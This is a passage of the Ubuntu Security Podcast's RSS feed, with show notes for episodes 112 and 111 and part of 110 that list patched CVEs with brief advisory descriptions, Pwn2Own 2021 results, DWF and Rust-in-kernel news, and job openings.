  an Ubuntu security webinar plus some details of the 45 CVEs addressed
  across the Ubuntu releases this last week and more.
  </description>
        <googleplay:description>  This week we look at a reboot of the DWF project, Rust in the Linux kernel,
  an Ubuntu security webinar plus some details of the 45 CVEs addressed
  across the Ubuntu releases this last week and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at a reboot of the DWF project, Rust in the Linux kernel,
an Ubuntu security webinar plus some details of the 45 CVEs addressed
across the Ubuntu releases this last week and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>45 unique CVEs addressed</p>
<h3 id="lsn-0075-1-linux-kernel-vulnerability-01-01">[<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2021-April/005960.html">LSN-0075-1</a>] Linux kernel vulnerability [01:01]</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27365">CVE-2021-27365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27364">CVE-2021-27364</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27363">CVE-2021-27363</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3444">CVE-2021-3444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29374">CVE-2020-29374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29372">CVE-2020-29372</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27171">CVE-2020-27171</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27170">CVE-2020-27170</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>madvise issue reported by Jann Horn -</li>
<li>BPF spectre mitigations fixes (<a href="https://ubuntusecuritypodcast.org/episode-109/">Episode 109</a>)</li>
</ul>
<h3 id="usn-4903-1-curl-vulnerability-02-02">[<a href="https://ubuntu.com/security/notices/USN-4903-1">USN-4903-1</a>] curl vulnerability [02:02]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22876">CVE-2021-22876</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-110/">Episode 110</a> - leaking credentials via HTTP Referer header</li>
</ul>
<h3 id="usn-4896-2-lxml-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4896-2">USN-4896-2</a>] lxml vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28957">CVE-2021-28957</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-110/">Episode 110</a></li>
</ul>
<h3 id="usn-4899-2-spamassassin-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4899-2">USN-4899-2</a>] SpamAssassin vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1946">CVE-2020-1946</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-110/">Episode 110</a></li>
</ul>
<h3 id="usn-4905-1-x-dot-org-x-server-vulnerability-02-26">[<a href="https://ubuntu.com/security/notices/USN-4905-1">USN-4905-1</a>] X.Org X Server vulnerability [02:26]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3472">CVE-2021-3472</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Local user (X client) could crash the server via Xinput extension and
ChangeFeedbackControl request - integer underflow -&gt; heap buffer overflow</li>
</ul>
<h3 id="usn-4906-1-nettle-vulnerability-03-31">[<a href="https://ubuntu.com/security/notices/USN-4906-1">USN-4906-1</a>] Nettle vulnerability [03:31]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20305">CVE-2021-20305</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Low level crypto library used by lots of packages - chrony, dnsmasq,
lighttpd, qemu, squid, supertuxkart</li>
<li>Could en up calling EC multiply with out-of-range scalers - as a result
would get incorrect results during EC signature verification and so could
allow an attacker to trigger an assertion failure -&gt; DoS OR force an
invalid signature - bypass verification</li>
</ul>
<h3 id="usn-4904-1-linux-kernel-vulnerabilities-04-27">[<a href="https://ubuntu.com/security/notices/USN-4904-1">USN-4904-1</a>] Linux kernel vulnerabilities [04:27]</h3>
<ul>
<li>11 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28038">CVE-2021-28038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26931">CVE-2021-26931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26930">CVE-2021-26930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20261">CVE-2021-20261</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19061">CVE-2019-19061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16232">CVE-2019-16232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16231">CVE-2019-16231</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13095">CVE-2018-13095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5967">CVE-2017-5967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16644">CVE-2017-16644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-1350">CVE-2015-1350</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4907-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4907-1">USN-4907-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3348">CVE-2021-3348</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3347">CVE-2021-3347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13095">CVE-2018-13095</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4909-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4909-1">USN-4909-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3348">CVE-2021-3348</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26931">CVE-2021-26931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26930">CVE-2021-26930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20194">CVE-2021-20194</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4910-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4910-1">USN-4910-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3178">CVE-2021-3178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3348">CVE-2021-3348</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3347">CVE-2021-3347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20268">CVE-2021-20268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20239">CVE-2021-20239</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4911-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4911-1">USN-4911-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28950">CVE-2021-28950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28375">CVE-2021-28375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28038">CVE-2021-28038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25639">CVE-2020-25639</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4912-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4912-1">USN-4912-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3178">CVE-2021-3178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3411">CVE-2021-3411</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20194">CVE-2021-20194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36158">CVE-2020-36158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27830">CVE-2020-27830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25669">CVE-2020-25669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25645">CVE-2020-25645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25285">CVE-2020-25285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14390">CVE-2020-14390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14351">CVE-2020-14351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0466">CVE-2020-0466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0465">CVE-2020-0465</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0423">CVE-2020-0423</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29154">CVE-2021-29154</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Piotr Krysiuk - BPF JIT - invalid branch displacement - could allow OOB
memory read/write -&gt; code exec or at least crash - unpriv in Ubuntu so
could then allow an unprivileged user to get kernel code exec</li>
<li>Thanks to kernel team for handling these issues - lots of kernel security
issues at the moment so thanks for their hard work</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="dwf-v2-07-25">DWF v2 [07:25]</h3>
<ul>
<li><a href="https://lwn.net/Articles/851849/">https://lwn.net/Articles/851849/</a></li>
<li><a href="https://iwantacve.org/">https://iwantacve.org/</a></li>
<li><a href="https://twitter.com/CVEannounce/status/1368992488464203777">https://twitter.com/CVEannounce/status/1368992488464203777</a></li>
</ul>
<h3 id="rust-support-for-linux-kernel-10-12">Rust support for Linux kernel [10:12]</h3>
<ul>
<li><a href="https://lore.kernel.org/lkml/20210414184604.23473-1-ojeda@kernel.org/">https://lore.kernel.org/lkml/20210414184604.23473-1-ojeda@kernel.org/</a></li>
<li><a href="https://security.googleblog.com/2021/04/rust-in-linux-kernel.html">https://security.googleblog.com/2021/04/rust-in-linux-kernel.html</a></li>
</ul>
<h3 id="securing-open-source-from-cloud-to-edge-webinar-12-19">Securing open source from cloud to edge webinar [12:19]</h3>
<ul>
<li><a href="https://www.brighttalk.com/webcast/6793/440517">https://www.brighttalk.com/webcast/6793/440517</a></li>
<li>Ubuntu is built with security in mind from the ground up, and how we keep
you protected against major vulnerabilities</li>
<li>How you can ensure performant open source in production environments</li>
<li>Specific security services that can help you achieve maximum availability
by reducing downtime and providing access to high and critical CVE fixes</li>
<li>Ubuntu helps organisations remain compliant with government and industry
standards and regulations, including Common Criteria EAL2 with FIPS 140-2
Level 1 certified crypto modules</li>
</ul>
<h3 id="hiring-13-13">Hiring [13:13]</h3>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847/apparmor-security-engineer-remote">https://canonical.com/careers/2114847/apparmor-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E112.mp3" length="11480197" type="audio/mpeg" /><itunes:duration>14:37</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 111
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-111/</link>
          <pubDate>Thu, 08 Apr 2021 12:04:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>d75611feb62b2de72f46adf7cb4f0854e210eb12cbc111b02a152e304d8038ff80936690f27a5ca76ec5673988fd1ca6526640820163fc1adff782ed9af454e0</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 111</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at how Ubuntu is faring at Pwn2Own 2021 (which still has
  1 day and 2 more attempts at pwning Ubuntu 20.10 to go) plus we look at
  security updates for SpamAssassin, the Linux kernel, Rack and Django, and
  we cover some...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at how Ubuntu is faring at Pwn2Own 2021 (which still has
  1 day and 2 more attempts at pwning Ubuntu 20.10 to go) plus we look at
  security updates for SpamAssassin, the Linux kernel, Rack and Django, and
  we cover some open positions on the Ubuntu Security team too.
  </itunes:summary>
        <description>  This week we look at how Ubuntu is faring at Pwn2Own 2021 (which still has
  1 day and 2 more attempts at pwning Ubuntu 20.10 to go) plus we look at
  security updates for SpamAssassin, the Linux kernel, Rack and Django, and
  we cover some open positions on the Ubuntu Security team too.
  </description>
        <googleplay:description>  This week we look at how Ubuntu is faring at Pwn2Own 2021 (which still has
  1 day and 2 more attempts at pwning Ubuntu 20.10 to go) plus we look at
  security updates for SpamAssassin, the Linux kernel, Rack and Django, and
  we cover some open positions on the Ubuntu Security team too.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at how Ubuntu is faring at Pwn2Own 2021 (which still has
1 day and 2 more attempts at pwning Ubuntu 20.10 to go) plus we look at
security updates for SpamAssassin, the Linux kernel, Rack and Django, and
we cover some open positions on the Ubuntu Security team too.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>14 unique CVEs addressed</p>
<h3 id="usn-4899-1-spamassassin-vulnerability-00-46">[<a href="https://ubuntu.com/security/notices/USN-4899-1">USN-4899-1</a>] SpamAssassin vulnerability [00:46]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1946">CVE-2020-1946</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Damian Lukowski - remote code execution in configuration file parser for
SpamAssassin - failed to properly sanitise certain elements of config
files so could allow an attacker to specify commands to be executed by
SpamAssassin - if not using configs from untrusted sources should be fine</li>
</ul>
<h3 id="usn-4900-1-openexr-vulnerabilities-01-40">[<a href="https://ubuntu.com/security/notices/USN-4900-1">USN-4900-1</a>] OpenEXR vulnerabilities [01:40]</h3>
<ul>
<li>6 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3479">CVE-2021-3479</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3478">CVE-2021-3478</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3477">CVE-2021-3477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3476">CVE-2021-3476</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3475">CVE-2021-3475</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3474">CVE-2021-3474</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual mix of memory corruption vulns in this image processing library -
DoS via memory consumption, integer overflow -&gt; buffer overflow -&gt; RCE
etc from crafted image files</li>
</ul>
<h3 id="usn-4901-1-linux-kernel--trusty-hwe--vulnerabilities-02-24">[<a href="https://ubuntu.com/security/notices/USN-4901-1">USN-4901-1</a>] Linux kernel (Trusty HWE) vulnerabilities [02:24]</h3>
<ul>
<li>4 CVEs addressed in Precise ESM (12.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27364">CVE-2021-27364</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27363">CVE-2021-27363</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28374">CVE-2020-28374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27365">CVE-2021-27365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3.13 kernel used as the HWE kernel from 14.04 backported to 12.04 ESM</li>
<li>iSCSI issues from <a href="https://ubuntusecuritypodcast.org/episode-109/">Episode 109</a> plus LIO SCSI XCOPY issue from <a href="https://ubuntusecuritypodcast.org/episode-102/">Episode 102</a></li>
</ul>
<h3 id="usn-4561-2-rack-vulnerabilities-03-27">[<a href="https://ubuntu.com/security/notices/USN-4561-2">USN-4561-2</a>] Rack vulnerabilities [03:27]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8184">CVE-2020-8184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8161">CVE-2020-8161</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Modular Ruby webserver interface</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-93/">Episode 93</a> - 18.04 LTS - now provided for remaining releases</li>
</ul>
<h3 id="usn-4902-1-django-vulnerability-03-53">[<a href="https://ubuntu.com/security/notices/USN-4902-1">USN-4902-1</a>] Django vulnerability [03:53]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28658">CVE-2021-28658</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Potential directory traversal via uploaded files - if using a custom
upload handler with the MultiPartParser from the django parsers
framework, could have been vulnerable - didn&rsquo;t affect any of the built-in
upload parsers within django hence the low priority rating for this CVE</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-at-pwn2own-2021-04-47">Ubuntu at Pwn2Own 2021 [04:47]</h3>
<ul>
<li><a href="https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results">https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results</a></li>
<li>6th, 7th &amp; 8th April - 23 separate entries targeting 10 different
products in the categories of Web Browsers, Virtualization, Servers,
Local Escalation of Privilege, and Enterprise
Communications (aka Zoom, MS Teams etc)</li>
<li>14 years - grows each year to include new targets / platforms - this year
included categories for both automotive (Tesla Model 3) and Enterprise
applications (MS Office, Adobe Reader) - but neither had any entrants</li>
<li>4 different teams targeted Ubuntu Desktop in local privilege escalation
category - go from a standard user to root - and pwn2own rules say this
must be via a kernel vulnerability - in this case it is an up-to-date
Ubuntu 20.10 install running inside a virtual machine</li>
<li>Attempts on day 1 and 2 were both successful - <a href="https://twitter.com/thezdi/status/1379543504590938114">Ryota Shiga</a> of Flatt
Security and <a href="https://twitter.com/thezdi/status/1379902313062600705">Manfred Paul</a> both used separate OOB access bugs to escalate
from a standard user to root
<ul>
<li>each earned $30,000 and 3 points in the competitions Master of Pwn
award</li>
</ul>
</li>
<li>Tomorrow (8th) will see two more attempts by Billy from STAR Labs and
Vincent Dehors of Synacktiv - this will be live-streamed too on <a href="https://youtu.be/dA3aIMgRFY8">YouTube</a>,
<a href="https://www.twitch.tv/trendmicro_events">Twitch</a>, and the <a href="https://www.pscp.tv/w/1lDxLpXEqeQxm">conference site</a>.</li>
<li>Also not just Ubuntu was exploited - so far all teams who have attempted
to exploit have been successful - Safari, MS Exchange, MS Teams, Windows
10, Parallels Desktop, Chrome, Microsoft Edge, Zoom
<ul>
<li>only exception so far is for STAR Labs who have not managed to get
their exploits working in the allotted time</li>
</ul>
</li>
<li>More details to follow once the vulns and their fixes become public -
competition has a 90 day policy for fixes to be public but I suspect we
will see these sooner than that - regardless will look at remaining results of
other 2 teams next week as well</li>
</ul>
<h3 id="hiring-10-03">Hiring [10:03]</h3>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847/apparmor-security-engineer-remote">https://canonical.com/careers/2114847/apparmor-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E111.mp3" length="9591856" type="audio/mpeg" /><itunes:duration>12:10</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 110
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-110/</link>
          <pubDate>Thu, 01 Apr 2021 11:38:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>a5a42f217ed6b0ae12ea68204a2f506d92c57d99ee778d0ee0b261d8544f41cf37c375e75f8643cb1c3e5664d4be482b80fd1ae01c3543c3773d073d5aac7760</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 110</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at 2 years of 14.04 ESM, a kernel Livepatch issue,
  DNS-over-HTTPS for Google Chrome plus security updates for ldb, OpenSSL,
  Squid, curl and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at 2 years of 14.04 ESM, a kernel Livepatch issue,
  DNS-over-HTTPS for Google Chrome plus security updates for ldb, OpenSSL,
  Squid, curl and more.
  </itunes:summary>
        <description>  This week we look at 2 years of 14.04 ESM, a kernel Livepatch issue,
  DNS-over-HTTPS for Google Chrome plus security updates for ldb, OpenSSL,
  Squid, curl and more.
  </description>
        <googleplay:description>  This week we look at 2 years of 14.04 ESM, a kernel Livepatch issue,
  DNS-over-HTTPS for Google Chrome plus security updates for ldb, OpenSSL,
  Squid, curl and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at 2 years of 14.04 ESM, a kernel Livepatch issue,
DNS-over-HTTPS for Google Chrome plus security updates for ldb, OpenSSL,
Squid, curl and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>38 unique CVEs addressed</p>
<h3 id="usn-4888-1-usn-4888-2-ldb-vulnerabilities-01-06">[<a href="https://ubuntu.com/security/notices/USN-4888-1">USN-4888-1</a>, <a href="https://ubuntu.com/security/notices/USN-4888-2">USN-4888-2</a>] ldb vulnerabilities [01:06]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27840">CVE-2020-27840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20277">CVE-2021-20277</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>In the ldb package but was reported by Samba - libldb provides an
LDAP-like database - is used internally by Samba etc - and whilst the
Samba package contains a copy of ldb internally we don&rsquo;t compile this in
Ubuntu, instead we link it against the ldb package in the repo so we only
have to patch a CVE in one place</li>
<li>Heap buffer overflow when parsing a DN string with lots of trailing
whitespace - allows to place a single NUL byte at a chosen offset before
an allocated buffer</li>
<li>Heap buffer overflow when parsing an LDAP attribute string with multiple
consecutive leading spaces - memmove() to a location beyond the end of
the buffer</li>
<li>Crash -&gt; DoS, can&rsquo;t rule out RCE due to nature of heap buffer overflows</li>
</ul>
<h3 id="usn-4889-1-linux-kernel-vulnerabilities-02-49">[<a href="https://ubuntu.com/security/notices/USN-4889-1">USN-4889-1</a>] Linux kernel vulnerabilities [02:49]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27364">CVE-2021-27364</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27363">CVE-2021-27363</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27365">CVE-2021-27365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>iSCSI issues discussed in <a href="https://ubuntusecuritypodcast.org/episode-109/">Episode 109</a> (most interesting was various heap
buffer overflows that could possibly be used for codeexec)</li>
</ul>
<h3 id="usn-4890-1-linux-kernel-vulnerabilities-03-09">[<a href="https://ubuntu.com/security/notices/USN-4890-1">USN-4890-1</a>] Linux kernel vulnerabilities [03:09]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27170">CVE-2020-27170</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27171">CVE-2020-27171</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>BPF speculative execution issues also discussed in <a href="https://ubuntusecuritypodcast.org/episode-109/">Episode 109</a></li>
</ul>
<h3 id="usn-4891-1-openssl-vulnerability-03-26">[<a href="https://ubuntu.com/security/notices/USN-4891-1">USN-4891-1</a>] OpenSSL vulnerability [03:26]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3449">CVE-2021-3449</a> <!-- raw HTML omitted --></li>
</ul>
</li>
